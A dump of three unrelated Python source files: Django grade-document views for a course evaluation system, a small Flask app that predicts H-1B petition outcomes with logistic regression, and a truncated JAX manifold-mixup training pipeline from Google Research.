content stringlengths 5 1.05M |
|---|
from django.shortcuts import get_object_or_404, render, redirect
from django.db.models import Prefetch
from django.contrib import messages
from django.conf import settings
from django.utils.translation import ugettext as _
from django.http import HttpResponseBadRequest, HttpResponseForbidden
from sendfile import sendfile
from evap.evaluation.auth import grade_publisher_required, grade_downloader_required, grade_publisher_or_staff_required
from evap.evaluation.models import Semester, Contribution, Course
from evap.grades.models import GradeDocument
from evap.grades.forms import GradeDocumentForm
from evap.evaluation.tools import send_publish_notifications
@grade_publisher_required
def index(request):
template_data = dict(
semesters=Semester.objects.all()
)
return render(request, "grades_index.html", template_data)
def prefetch_data(courses):
courses = courses.prefetch_related(
Prefetch("contributions", queryset=Contribution.objects.filter(responsible=True).select_related("contributor"), to_attr="responsible_contribution"),
"degrees")
course_data = []
for course in courses:
course.responsible_contributor = course.responsible_contribution[0].contributor
course_data.append((
course,
GradeDocument.objects.filter(course=course, type=GradeDocument.MIDTERM_GRADES).count(),
GradeDocument.objects.filter(course=course, type=GradeDocument.FINAL_GRADES).count()
))
return course_data
@grade_publisher_required
def semester_view(request, semester_id):
semester = get_object_or_404(Semester, id=semester_id)
courses = semester.course_set.filter(is_graded=True).exclude(state='new')
courses = prefetch_data(courses)
template_data = dict(
semester=semester,
courses=courses,
disable_if_archived="disabled=disabled" if semester.is_archived else "",
disable_breadcrumb_semester=True,
)
return render(request, "grades_semester_view.html", template_data)
@grade_publisher_or_staff_required
def course_view(request, semester_id, course_id):
semester = get_object_or_404(Semester, id=semester_id)
course = get_object_or_404(Course, id=course_id)
is_grade_publisher = request.user.is_grade_publisher
template_data = dict(
semester=semester,
course=course,
grade_documents=course.grade_documents.all(),
disable_if_archived="disabled=disabled" if semester.is_archived else "",
disable_breadcrumb_course=True,
is_grade_publisher=is_grade_publisher,
)
return render(request, "grades_course_view.html", template_data)
@grade_publisher_required
def upload_grades(request, semester_id, course_id):
semester = get_object_or_404(Semester, id=semester_id)
course = get_object_or_404(Course, id=course_id)
final_grades = request.GET.get('final', 'false') # default: midterm grades
final_grades = {'true': True, 'false': False}.get(final_grades.lower()) # convert parameter to boolean
grade_document = GradeDocument(course=course)
if final_grades:
grade_document.type = GradeDocument.FINAL_GRADES
grade_document.description = settings.DEFAULT_FINAL_GRADES_DESCRIPTION
else:
grade_document.type = GradeDocument.MIDTERM_GRADES
grade_document.description = settings.DEFAULT_MIDTERM_GRADES_DESCRIPTION
form = GradeDocumentForm(request.POST or None, request.FILES or None, instance=grade_document)
if form.is_valid():
form.save(modifying_user=request.user)
if final_grades and course.state == 'reviewed':
course.publish()
course.save()
send_publish_notifications(grade_document_courses=[course], evaluation_results_courses=[course])
else:
send_publish_notifications(grade_document_courses=[course])
messages.success(request, _("Successfully uploaded grades."))
return redirect('grades:course_view', semester.id, course.id)
else:
template_data = dict(
semester=semester,
course=course,
form=form,
final_grades=final_grades,
show_automated_publishing_info=final_grades,
)
return render(request, "grades_upload_form.html", template_data)
@grade_publisher_required
def toggle_no_grades(request, semester_id, course_id):
semester = get_object_or_404(Semester, id=semester_id)
course = get_object_or_404(Course, id=course_id)
if request.method == 'POST':
course.gets_no_grade_documents = not course.gets_no_grade_documents
course.save()
if course.gets_no_grade_documents:
if course.state == 'reviewed':
course.publish()
course.save()
send_publish_notifications(evaluation_results_courses=[course])
messages.success(request, _("Successfully confirmed that no grade documents will be provided."))
else:
messages.success(request, _("Successfully confirmed that grade documents will be provided later on."))
return redirect('grades:semester_view', semester_id)
else:
template_data = dict(
semester=semester,
course=course,
)
return render(request, "toggle_no_grades.html", template_data)
@grade_downloader_required
def download_grades(request, grade_document_id):
if not request.method == "GET":
return HttpResponseBadRequest()
grade_document = get_object_or_404(GradeDocument, id=grade_document_id)
return sendfile(request, grade_document.file.path, attachment=True, attachment_filename=grade_document.filename())
@grade_publisher_required
def edit_grades(request, semester_id, course_id, grade_document_id):
semester = get_object_or_404(Semester, id=semester_id)
course = get_object_or_404(Course, id=course_id)
grade_document = get_object_or_404(GradeDocument, id=grade_document_id)
form = GradeDocumentForm(request.POST or None, request.FILES or None, instance=grade_document)
if form.is_valid():
form.save(modifying_user=request.user)
messages.success(request, _("Successfully updated grades."))
return redirect('grades:course_view', semester.id, course.id)
else:
template_data = dict(
semester=semester,
course=course,
form=form,
show_automated_publishing_info=False,
)
return render(request, "grades_upload_form.html", template_data)
@grade_publisher_required
def delete_grades(request, semester_id, course_id, grade_document_id):
semester = get_object_or_404(Semester, id=semester_id)
course = get_object_or_404(Course, id=course_id)
grade_document = get_object_or_404(GradeDocument, id=grade_document_id)
if request.method == 'POST':
grade_document.delete()
messages.success(request, _("Successfully deleted grade document."))
return redirect('grades:course_view', semester_id, course_id)
else:
template_data = dict(
semester=semester,
course=course,
grade_document=grade_document,
)
return render(request, "grades_delete.html", template_data)
|
#Importing the required packages
from flask import Flask, render_template, request
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings('ignore')
from sklearn.linear_model import LogisticRegression
app = Flask(__name__)
#Routing to initial home page
@app.route('/')
def home():
return render_template('home.html')
#Routing to page when Attribute Entry is selected
@app.route('/attribute_entry')
def attribute_entry():
return render_template('attribute_entry.html')
#Obtaining values from attribute entry and processing them
@app.route('/yes', methods=['GET', 'POST'])
def yes():
#Obtaining the values from HTML form
ftp=request.form['FULL_TIME_POSITION']
pwl=request.form['PW_WAGE_LEVEL']
pws=request.form['PW_SOURCE']
agc=request.form['AGENT_ATTORNEY_CITY_BIN']
empn=request.form['EMPLOYER_NAME_BIN']
emps=request.form['EMPLOYER_STATE_BIN']
soc=request.form['SOC_REVISED_CODE']
#print(h1bd,'\n',ftp,'\n',vd,'\n',pwl,'\n',pws,'\n',wup,'\n',amdp,'\n',newe,'\n',cpe,'\n',
#are,'\n',ags,'\n',agc,'\n',empn,'\n',emps,'\n',empc,'\n',wss,'\n',wsc,'\n',soc,'\n',naics)
#Initializing the one hot encoded columns to 0
ftp_Y=0
ftp_N=0
empn_Bin1 = 0
empn_Bin2 = 0
empn_Bin3 = 0
empn_Bin4 = 0
empn_Bin5 = 0
empn_Others = 0
agc_Bin1 = 0
agc_Bin2 = 0
agc_Bin3 = 0
agc_Bin4 = 0
agc_Bin5 = 0
agc_None = 0
agc_Others = 0
pwl_LevelI = 0
pwl_LevelII = 0
pwl_LevelIII = 0
pwl_LevelIV = 0
soc_10 = 0
soc_11 = 0
soc_12 = 0
soc_13 = 0
soc_15 = 0
soc_16 = 0
soc_17 = 0
soc_18 = 0
soc_19 = 0
soc_20 = 0
soc_21 = 0
soc_22 = 0
soc_23 = 0
soc_24 = 0
soc_25 = 0
soc_26 = 0
soc_27 = 0
soc_29 = 0
soc_31 = 0
soc_33 = 0
soc_35 = 0
soc_36 = 0
soc_37 = 0
soc_38 = 0
soc_39 = 0
soc_40 = 0
soc_41 = 0
soc_43 = 0
soc_45 = 0
soc_46 = 0
soc_47 = 0
soc_49 = 0
soc_51 = 0
soc_53 = 0
soc_71 = 0
soc_73 = 0
soc_74 = 0
soc_11 = 0
soc_13 = 0
soc_15 = 0
soc_16 = 0
soc_17 = 0
soc_18 = 0
soc_19 = 0
soc_20 = 0
soc_21 = 0
soc_23 = 0
soc_25 = 0
soc_27 = 0
soc_28 = 0
soc_29 = 0
soc_31 = 0
soc_33 = 0
soc_35 = 0
soc_36 = 0
soc_37 = 0
soc_39 = 0
soc_40 = 0
soc_41 = 0
soc_43 = 0
soc_45 = 0
soc_47 = 0
soc_49 = 0
soc_50 = 0
soc_51 = 0
soc_53 = 0
soc_71 = 0
soc_73 = 0
soc_75 = 0
soc_79 = 0
soc_AC = 0
soc_AI = 0
soc_CO = 0
soc_EL = 0
soc_SO = 0
pws_CBA = 0
pws_DBA = 0
pws_OES = 0
pws_Other = 0
pws_SCA = 0
emps_Bin1 = 0
emps_Bin2 = 0
emps_Bin3 = 0
emps_Bin4 = 0
emps_Bin5 = 0
emps_Bin6 = 0
emps_Bin7 = 0
emps_Others = 0
#Setting the value obtained from form to 1
if ftp=='Y':
ftp_Y=1
if ftp=='N':
ftp_N=1
if empn =="Bin1":
empn_Bin1=1
if empn =="Bin2":
empn_Bin2=1
if empn =="Bin3":
empn_Bin3=1
if empn =="Bin4":
empn_Bin4=1
if empn =="Bin5":
empn_Bin5=1
if empn =="Others":
empn_Others=1
if agc =="Bin1":
agc_Bin1=1
if agc =="Bin2":
agc_Bin2=1
if agc =="Bin3":
agc_Bin3=1
if agc =="Bin4":
agc_Bin4=1
if agc =="Bin5":
agc_Bin5=1
if agc =="Others":
agc_Others=1
if agc =="None":
agc_None=1
if pwl =="Level I":
pwl_LevelI =1
if pwl =="Level II":
pwl_LevelII =1
if pwl =="Level III":
pwl_LevelIII =1
if pwl =="Level IV":
pwl_LevelIV =1
if soc == '10':
soc_10 = 1
if soc == '11':
soc_11 = 1
if soc == '12':
soc_12 = 1
if soc == '13':
soc_13 = 1
if soc == '14':
soc_14 = 1
if soc == '15':
soc_15 = 1
if soc == '16':
soc_16 = 1
if soc == '17':
soc_17 = 1
if soc == '18':
soc_18 = 1
if soc == '19':
soc_19 = 1
if soc == '20':
soc_20 = 1
if soc == '21':
soc_21 = 1
if soc == '22':
soc_22 = 1
if soc == '23':
soc_23 = 1
if soc == '24':
soc_24 = 1
if soc == '25':
soc_25 = 1
if soc == '26':
soc_26 = 1
if soc == '27':
soc_27 = 1
if soc == '28':
soc_28 = 1
if soc == '29':
soc_29 = 1
if soc == '30':
soc_30 = 1
if soc == '31':
soc_31 = 1
if soc == '32':
soc_32 = 1
if soc == '33':
soc_33 = 1
if soc == '34':
soc_34 = 1
if soc == '35':
soc_35 = 1
if soc == '36':
soc_36 = 1
if soc == '37':
soc_37 = 1
if soc == '38':
soc_38 = 1
if soc == '39':
soc_39 = 1
if soc == '40':
soc_40 = 1
if soc == '41':
soc_41 = 1
if soc == '42':
soc_42 = 1
if soc == '43':
soc_43 = 1
if soc == '44':
soc_44 = 1
if soc == '45':
soc_45 = 1
if soc == '46':
soc_46 = 1
if soc == '47':
soc_47 = 1
if soc == '48':
soc_48 = 1
if soc == '49':
soc_49 = 1
if soc == '50':
soc_50 = 1
if soc == '51':
soc_51 = 1
if soc == '52':
soc_52 = 1
if soc == '53':
soc_53 = 1
if soc == '54':
soc_54 = 1
if soc == '55':
soc_55 = 1
if soc == '56':
soc_56 = 1
if soc == '57':
soc_57 = 1
if soc == '58':
soc_58 = 1
if soc == '59':
soc_59 = 1
if soc == '60':
soc_60 = 1
if soc == '61':
soc_61 = 1
if soc == '62':
soc_62 = 1
if soc == '63':
soc_63 = 1
if soc == '64':
soc_64 = 1
if soc == '65':
soc_65 = 1
if soc == '66':
soc_66 = 1
if soc == '67':
soc_67 = 1
if soc == '68':
soc_68 = 1
if soc == '69':
soc_69 = 1
if soc == '70':
soc_70 = 1
if soc == '71':
soc_71 = 1
if soc == '72':
soc_72 = 1
if soc == '73':
soc_73 = 1
if soc == '74':
soc_74 = 1
if soc == '75':
soc_75 = 1
if soc == '76':
soc_76 = 1
if soc == '77':
soc_77 = 1
if soc == '78':
soc_78 = 1
if soc == '79':
soc_79 = 1
if soc == "AC":
soc_AC=1
if soc == "AI":
soc_AI=1
if soc == "CO":
soc_CO=1
if soc == "EL":
soc_EL=1
if soc == "SO":
soc_SO=1
if(pws=="CBA"):
pws_CBA=1
if(pws=="DBA"):
pws_DBA=1
if(pws=="OES"):
pws_OES=1
if(pws=="Other"):
pws_Other=1
if(pws=="SCA"):
pws_SCA=1
if(emps=="Bin1"):
emps_Bin1=1
if(emps=="Bin2"):
emps_Bin2=1
if(emps=="Bin3"):
emps_Bin3=1
if(emps=="Bin4"):
emps_Bin4=1
if(emps=="Bin5"):
emps_Bin5=1
if(emps=="Bin6"):
emps_Bin6=1
if(emps=="Bin7"):
emps_Bin7=1
if(emps=="Others"):
emps_Others=1
#Training the data
df=pd.read_csv('train.csv')
train =df.drop(['Unnamed: 0','WORKSITE_STATE', 'WORKSITE_COUNTY_BIN',
'AGENT_ATTORNEY_STATE_BIN', 'AMENDED_PETITION_BIN',
'AGENT_REPRESENTING_EMPLOYER',
'NEW_EMPLOYMENT_BIN', 'CHANGE_PREVIOUS_EMPLOYMENT_BIN'],axis=1)
train = train.drop(train.iloc[:,1:5],axis=1)
train=train.drop(['Target','WAGE_UNIT_OF_PAY'],axis=1)
trainX =pd.get_dummies(train)
#print(len(trainX.columns))
trainY = df['Target']
#trainX=trainX[["FULL_TIME_POSITION_N","FULL_TIME_POSITION_Y","EMPLOYER_NAME_BIN_Bin1","EMPLOYER_NAME_BIN_Bin2","EMPLOYER_NAME_BIN_Bin3","EMPLOYER_NAME_BIN_Bin4","EMPLOYER_NAME_BIN_Bin5","EMPLOYER_NAME_BIN_Others","AGENT_ATTORNEY_CITY_BIN_Bin1","AGENT_ATTORNEY_CITY_BIN_Bin2","AGENT_ATTORNEY_CITY_BIN_Bin3","AGENT_ATTORNEY_CITY_BIN_Bin4","AGENT_ATTORNEY_CITY_BIN_Bin5","AGENT_ATTORNEY_CITY_BIN_None","AGENT_ATTORNEY_CITY_BIN_Others","PW_WAGE_LEVEL_Level I","PW_WAGE_LEVEL_Level II","PW_WAGE_LEVEL_Level III","PW_WAGE_LEVEL_Level IV","SOC_REVISED_CODE_10","SOC_REVISED_CODE_11","SOC_REVISED_CODE_12","SOC_REVISED_CODE_13","SOC_REVISED_CODE_15","SOC_REVISED_CODE_16","SOC_REVISED_CODE_17","SOC_REVISED_CODE_18","SOC_REVISED_CODE_19","SOC_REVISED_CODE_20","SOC_REVISED_CODE_21","SOC_REVISED_CODE_22","SOC_REVISED_CODE_23","SOC_REVISED_CODE_24","SOC_REVISED_CODE_25","SOC_REVISED_CODE_26","SOC_REVISED_CODE_27","SOC_REVISED_CODE_29","SOC_REVISED_CODE_31","SOC_REVISED_CODE_33","SOC_REVISED_CODE_35","SOC_REVISED_CODE_36","SOC_REVISED_CODE_37","SOC_REVISED_CODE_38","SOC_REVISED_CODE_39","SOC_REVISED_CODE_40","SOC_REVISED_CODE_41","SOC_REVISED_CODE_43","SOC_REVISED_CODE_45","SOC_REVISED_CODE_46","SOC_REVISED_CODE_47","SOC_REVISED_CODE_49","SOC_REVISED_CODE_51","SOC_REVISED_CODE_53","SOC_REVISED_CODE_71","SOC_REVISED_CODE_73","SOC_REVISED_CODE_74","SOC_REVISED_CODE_11","SOC_REVISED_CODE_13","SOC_REVISED_CODE_15","SOC_REVISED_CODE_16","SOC_REVISED_CODE_17","SOC_REVISED_CODE_18","SOC_REVISED_CODE_19","SOC_REVISED_CODE_20","SOC_REVISED_CODE_21","SOC_REVISED_CODE_23","SOC_REVISED_CODE_25","SOC_REVISED_CODE_27","SOC_REVISED_CODE_28","SOC_REVISED_CODE_29","SOC_REVISED_CODE_31","SOC_REVISED_CODE_33","SOC_REVISED_CODE_35","SOC_REVISED_CODE_36","SOC_REVISED_CODE_37","SOC_REVISED_CODE_39","SOC_REVISED_CODE_40","SOC_REVISED_CODE_41","SOC_REVISED_CODE_43","SOC_REVISED_CODE_45","SOC_REVISED_CODE_47","SOC_REVISED_CODE_49","SOC_REVISED_CODE_50","SOC_REVISED_CODE_51","SOC_REVISED_CODE_53","SOC_REVISED_CODE_71","SOC_REVISED_CODE_73","SOC_REVISED_CODE_75","SOC_REVISED_CODE_79","SOC_REVISED_CODE_AC","SOC_REVISED_CODE_AI","SOC_REVISED_CODE_CO","SOC_REVISED_CODE_EL","SOC_REVISED_CODE_SO","PW_SOURCE_CBA","PW_SOURCE_DBA","PW_SOURCE_OES","PW_SOURCE_Other","PW_SOURCE_SCA","EMPLOYER_STATE_BIN_Bin1","EMPLOYER_STATE_BIN_Bin2","EMPLOYER_STATE_BIN_Bin3","EMPLOYER_STATE_BIN_Bin4","EMPLOYER_STATE_BIN_Bin5","EMPLOYER_STATE_BIN_Bin6","EMPLOYER_STATE_BIN_Bin7","EMPLOYER_STATE_BIN_Others"]]
test_list=[empn_Bin1, empn_Bin2, empn_Bin3, empn_Bin4, empn_Bin5, empn_Others, agc_Bin1, agc_Bin2, agc_Bin3, agc_Bin4, agc_Bin5, agc_None, agc_Others, pwl_LevelI, pwl_LevelII, pwl_LevelIII, pwl_LevelIV, soc_10, soc_11, soc_12, soc_13, soc_15, soc_16, soc_17, soc_18, soc_19, soc_20, soc_21, soc_22, soc_23, soc_24, soc_25, soc_26, soc_27, soc_29, soc_31, soc_33, soc_35, soc_36, soc_37, soc_38, soc_39, soc_40, soc_41, soc_43, soc_45, soc_46, soc_47, soc_49, soc_51, soc_53, soc_71, soc_73, soc_74, soc_11, soc_13, soc_15, soc_16, soc_17, soc_18, soc_19, soc_20, soc_21, soc_23, soc_25, soc_27, soc_28, soc_29, soc_31, soc_33, soc_35, soc_36, soc_37, soc_39, soc_40, soc_41, soc_43, soc_45, soc_47, soc_49, soc_50, soc_51, soc_53, soc_71, soc_73, soc_75, soc_79, soc_AC, soc_AI, soc_CO, soc_EL, soc_SO, pws_CBA, pws_DBA, pws_OES, pws_Other, pws_SCA, emps_Bin1, emps_Bin2, emps_Bin3, emps_Bin4, emps_Bin5, emps_Bin6, emps_Bin7, emps_Others,ftp_N,ftp_Y]
#print(len(trainX.columns))
#print(len(testdf.columns))
testdf=pd.DataFrame([test_list])
trainX=np.asarray(trainX)
trainY=np.asarray(trainY)
testX=np.asarray(testdf)
lr=LogisticRegression(solver='lbfgs')
lr.fit(trainX,trainY)
THRESHOLD = 0.015
yhat = np.where(lr.predict_proba(testX)[:,1] > THRESHOLD, 1, 0)
ci=lr.predict_proba(testX).max()
ci*=100
ci=round(ci,2)
if yhat==1:
disp='DENIED'
return render_template('yes.html',value=disp,value1=ci)
else:
disp='ACCEPTED'
return render_template('yes.html',value=disp,value1=ci)
@app.route('/insights',methods=['GET'])
def insights():
return render_template('insights.html')
if __name__ == '__main__':
app.run()
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""training pipeline for multi environment manifold mixup."""
import functools
import time
from flax.deprecated import nn
import jax
import jax.numpy as jnp
from gift.pipelines import multi_env_end2end
from gift.pipelines import pipeline_utils
from gift.utils import tensor_util
class MultiEnvManifoldMixup(multi_env_end2end.MultiEnvReps2Reps):
"""Training pipeline for multiple environments using manifold mixup."""
def setup_pmapped_tain_and_eval_steps(self):
eval_env_ids = list(
map(int, self.task.dataset.data_iters.validation.keys()))
train_env_ids, _ = list(
zip(*dict(self.task.dataset.data_iters['train']).items()))
train_env_ids = list(map(int, train_env_ids))
self.p_train_step = functools.partial(
self.train_step, env_ids=train_env_ids)
self.pmapped_train_step = jax.pmap(
self.p_train_step,
axis_name='batch',
in_axes=(0, 0),
static_broadcasted_argnums=(2,),
donate_argnums=(0, 1))
self.p_eval_step = functools.partial(
self.eval_step, all_env_ids=eval_env_ids)
self.pmapped_eval_step = jax.pmap(
self.p_eval_step,
axis_name='batch',
in_axes=(0, 0),
static_broadcasted_argnums=(2,))
self.pmapped_forward_pass = jax.pmap(
self.forward_pass, axis_name='batch', in_axes=(0, 0, 0, 0))
def training_loss_fn(self, flax_model, train_state, batch, dropout_rng,
env_ids, sampled_layer):
"""Runs forward pass and computes loss.
Args:
flax_model: A flax module.
train_state: TrainState, the state of training including the current
global_step, model_state, rng, and optimizer.
batch: Batches from different environments.
dropout_rng: FLAX PRNG key.
env_ids: list[int]; List of env codes.
sampled_layer: str; Name of the layer on which mixup is applied.
Returns:
loss, new_module_state and computed logits for each batch.
"""
dropout_rng, new_rng = jax.random.split(dropout_rng)
with nn.stochastic(dropout_rng):
# Run student forward pass:
(all_env_reps, env_logits, selected_env_reps,
train_state) = self.stateful_forward_pass(flax_model, train_state, batch)
new_model_state = train_state.model_state
sampled_reps = all_env_reps[sampled_layer]
interpolate_fn = jax.vmap(
pipeline_utils.interpolate,
in_axes=(0, 0, 0, 0, None, None, None, None))
interpolate_rng, new_rng = jax.random.split(new_rng)
with nn.stochastic(interpolate_rng):
(interpolated_batches, interpolated_logits, sampled_lambdas,
train_state) = self.maybe_inter_env_interpolation(
batch, env_ids, flax_model, interpolate_fn, sampled_layer,
sampled_reps, selected_env_reps, train_state)
(same_env_interpolated_batches, same_env_interpolated_logits, _,
train_state) = self.maybe_intra_env_interpolation(
batch, env_ids, flax_model, interpolate_fn, sampled_layer,
sampled_reps, train_state)
loss_rng, new_rng = jax.random.split(new_rng)
with nn.stochastic(loss_rng):
# Compute the total loss (inside nn.stochastic):
loss = self.task.loss_function(env_logits, selected_env_reps, batch,
env_ids, flax_model.params,
train_state.global_step)
# Add the loss for cross environment interpolated states:
if len(env_ids) > 1 and self.hparams.get('inter_env_interpolation', True):
inter_mixup_factor = self.hparams.get('inter_mixup_factor', 1.0)
loss += self.task.loss_function(
interpolated_logits, None, interpolated_batches, None, None,
train_state.global_step) * inter_mixup_factor
# Add the loss for same environment interpolated states:
if self.hparams.get('intra_env_interpolation', True):
intra_mixup_factor = self.hparams.get('intra_mixup_factor', 1.0)
loss += self.task.loss_function(
same_env_interpolated_logits, None, same_env_interpolated_batches,
None, None, train_state.global_step) * intra_mixup_factor
logs = {'sampled_lambdas': sampled_lambdas}
return loss, (new_model_state, env_logits, logs)
# TODO(samiraabnar): Try to avoid code duplication when overriding this fn.
def train_step(self, train_state, batch, env_ids, sampled_layer):
"""Runs a single step of training.
Given the state of the training and a batch of data, computes
the loss and updates the parameters of the model.
Args:
train_state: TrainState, the state of training including the current
global_step, model_state, rng, and optimizer.
batch: A single batch of data.
env_ids: list(int): List of training environments codes.
sampled_layer: str; Name of the layer on which mixup is applied.
Returns:
Updated state of training and calculated metrics.
"""
max_grad_norm = self.hparams.get('max_grad_norm', None)
new_rng, rng = jax.random.split(train_state.rng)
# bind the rng to the host/device we are on.
dropout_rng = pipeline_utils.bind_rng_to_host_device(
rng, axis_name='batch', bind_to=['host', 'device'])
train_loss_fn = functools.partial(
self.training_loss_fn,
train_state=train_state,
batch=batch,
dropout_rng=dropout_rng,
env_ids=env_ids,
sampled_layer=sampled_layer)
new_train_state, metrics = self.compute_grads_and_update(
batch, env_ids, max_grad_norm, new_rng, train_loss_fn, train_state)
return new_train_state, metrics
def train(self):
"""Training loop."""
master = jax.host_id() == 0
train_metrics = []
train_summary, eval_summary = None, None
tick = time.time()
eval_env_ids = list(
map(int, self.task.dataset.data_iters.validation.keys()))
train_env_ids, train_iters = list(
zip(*dict(self.task.dataset.data_iters['train']).items()))
train_env_ids = list(map(int, train_env_ids))
# Prepare arguments for layer sampling:
sample_batch = self.get_next_batch(train_iters)
_, all_env_reps, _, _ = self.pmapped_forward_pass(
self.train_state.optimizer.target, self.train_state, sample_batch,
self.train_state.rng)
layer_keys, mixup_layers = pipeline_utils.get_sample_layer_params(
self.hparams, all_env_reps)
# Train loop:
for step in range(self.start_step + 1, self.total_steps + 1):
train_batches = self.get_next_batch(train_iters)
sampled_layer = pipeline_utils.sample_layer(
layer_keys, mixup_layers=mixup_layers)
self.train_state, t_metrics = self.pmapped_train_step(
self.train_state, train_batches, train_env_ids, sampled_layer)
t_metrics = jax.tree_map(lambda x: x[0], t_metrics)
train_metrics.append(t_metrics)
(eval_summary, train_metrics, train_summary,
tick) = self.maybe_eval_and_log(eval_env_ids, eval_summary, master, step,
tick, train_metrics, train_summary)
# Sync and save
self.checkpoint(self.train_state, step)
# wait until computations are done before exiting (for timing!)
jax.random.normal(jax.random.PRNGKey(0), ()).block_until_ready()
# return the train and eval summary after last step for regresesion testing
return train_summary, eval_summary
def maybe_intra_env_interpolation(self, batch, env_ids, flax_model,
interpolate_fn, sampled_layer, sampled_reps,
train_state):
if self.hparams.get('intra_env_interpolation', True):
# Set alpha ans beta for sampling lambda:
beta_params = pipeline_utils.get_weight_param(self.hparams, 'beta', 1.0)
alpha_params = pipeline_utils.get_weight_param(self.hparams, 'alpha', 1.0)
step = train_state.global_step
beta = pipeline_utils.scheduler(step, beta_params)
alpha = pipeline_utils.scheduler(step, alpha_params)
# This is just a random matching (similar to manifold mixup paper).
self_aligned_matching_matrix, self_pair_ids = self.get_intra_env_matchings(
batch, sampled_reps, env_ids)
# Compute interpolated representations of sampled layer:
same_env_inter_reps, sample_lambdas = interpolate_fn(
jax.random.split(nn.make_rng(), len(sampled_reps)),
self_aligned_matching_matrix, sampled_reps, sampled_reps,
self.hparams.get('num_of_lambdas_samples_for_mixup',
1), alpha, beta, -1)
# Get interpolated batches (interpolated inputs, labels, and weights)
same_env_interpolated_batches = self.get_interpolated_batches(
batch, same_env_inter_reps, self_pair_ids, sample_lambdas,
self.hparams.get('intra_interpolation_method',
'plain_convex_combination'))
if self.hparams.get('stop_grad_for_intra_mixup', True):
same_env_interpolated_batches = jax.lax.stop_gradient(
same_env_interpolated_batches)
# Compute logits for the interpolated states:
(_, same_env_interpolated_logits, _,
train_state) = self.stateful_forward_pass(flax_model, train_state,
same_env_interpolated_batches,
sampled_layer)
return (same_env_interpolated_batches, same_env_interpolated_logits,
sample_lambdas, train_state)
return None, None, 0, train_state
def maybe_inter_env_interpolation(self, batch, env_ids, flax_model,
interpolate_fn, sampled_layer, sampled_reps,
selected_env_reps, train_state):
if len(env_ids) > 1 and self.hparams.get('inter_env_interpolation', True):
# We call the alignment method of the task class:
aligned_pairs = self.task.get_env_aligned_pairs_idx(
selected_env_reps, batch, env_ids)
pair_keys, alignments = zip(*aligned_pairs.items())
# Convert alignments which is the array of aligned indices to match mat.
alignments = jnp.asarray(alignments)
num_env_pairs = alignments.shape[0]
batch_size = alignments.shape[2]
matching_matrix = jnp.zeros(
shape=(num_env_pairs, batch_size, batch_size), dtype=jnp.float32)
matching_matrix = matching_matrix.at[:, alignments[:, 0],
alignments[:, 1]].set(1.0)
# Convert pair keys to pair ids (indices in the env_ids list).
pair_ids = [(env_ids.index(int(x[0])), env_ids.index(int(x[1])))
for x in pair_keys]
# Get sampled layer activations and group them similar to env pairs.
paired_reps = jnp.array([
(sampled_reps[envs[0]], sampled_reps[envs[1]]) for envs in pair_ids
])
# Set alpha and beta for sampling lambda:
beta_params = pipeline_utils.get_weight_param(self.hparams, 'inter_beta',
1.0)
alpha_params = pipeline_utils.get_weight_param(self.hparams,
'inter_alpha', 1.0)
beta = pipeline_utils.scheduler(train_state.global_step, beta_params)
alpha = pipeline_utils.scheduler(train_state.global_step, alpha_params)
# Get interpolated reps for each env pair:
inter_reps, sample_lambdas = interpolate_fn(
jax.random.split(nn.make_rng(), len(paired_reps[:, 0])),
matching_matrix, paired_reps[:, 0], paired_reps[:, 1],
self.hparams.get('num_of_lambdas_samples_for_inter_mixup',
1), alpha, beta, -1)
# Get interpolated batches for each env pair:
interpolated_batches = self.get_interpolated_batches(
batch, inter_reps, pair_ids, sample_lambdas,
self.hparams.get('intra_interpolation_method',
'plain_convex_combination'))
if self.hparams.get('stop_grad_for_inter_mixup', True):
interpolated_batches = jax.lax.stop_gradient(interpolated_batches)
# Compute logits for the interpolated states:
_, interpolated_logits, _, train_state = self.stateful_forward_pass(
flax_model, train_state, interpolated_batches, sampled_layer)
return (interpolated_batches, interpolated_logits, sample_lambdas,
train_state)
return None, None, 0, train_state
def get_intra_env_matchings(self, batch, reps, env_ids):
"""This functions returns alignment for matching example of single envs.
For now, this is only returning random permutations.
Args:
batch: list(dict); List of environment batches.
reps: list(jnp array); representations of a selected layer for each env
batch.
env_ids: list(int); list of environment ids.
Returns:
self_aligned_matching_matrix, self_pair_ids
"""
self_aligned_matching_matrix = []
self_pair_ids = []
for env_id, env_batch, env_reps in zip(env_ids, batch, reps):
self_aligned_matching_matrix.append(
pipeline_utils.get_self_matching_matrix(
env_batch,
env_reps,
mode=self.hparams.get('intra_mixup_mode', 'random'),
label_cost=self.hparams.get('intra_mixup_label_cost', 1.0),
l2_cost=self.hparams.get('intra_mixup_l2_cost', 0.001)))
self_pair_ids.append((env_ids.index(env_id), env_ids.index(env_id)))
self_aligned_matching_matrix = jnp.array(self_aligned_matching_matrix)
return self_aligned_matching_matrix, self_pair_ids
def get_interpolated_batches(self,
batch,
new_reps,
pair_ids,
sample_lambdas,
interpolation_method='plain_convex_combination'):
interpolated_batch_keys = []
keys = []
# Batch keys that should be interpolated:
key = 'label'
paired_batch_keys = jnp.array([
(batch[x[0]][key], batch[x[1]][key]) for x in pair_ids
])
if interpolation_method == 'plain_convex_combination':
interpolated_batch_keys.append(
jax.vmap(tensor_util.convex_interpolate)(paired_batch_keys[:, 0],
paired_batch_keys[:, 1],
sample_lambdas))
else:
# If the interpolation method is wasserstein or something else, we will
# assuming the interpolation is label preserving, hence use the label of
# of the source examples.
interpolated_batch_keys.append(paired_batch_keys[:, 0])
keys.append(key)
# If batch has weights attribute:
if batch[0].get('weights') is not None:
key = 'weights'
paired_batch_keys = jnp.array([
(batch[x[0]][key], batch[x[1]][key]) for x in pair_ids
])
interpolated_batch_keys.append(
jax.vmap(tensor_util.convex_interpolate)(paired_batch_keys[:, 0],
paired_batch_keys[:, 1],
sample_lambdas))
keys.append(key)
# Set env_name to the env_name of first batch:
key = 'env_name'
paired_batch_keys = jnp.array(
list(map(lambda x: (batch[x[0]][key], batch[x[1]][key]), pair_ids)))
interpolated_batch_keys.append(paired_batch_keys[:, 0])
keys.append(key)
# Set inputs to interpolated reps:
key = 'inputs'
interpolated_batch_keys.append(new_reps)
keys.append(key)
interpolated_batches = []
for j in range(len(pair_ids)):
new_batch = {}
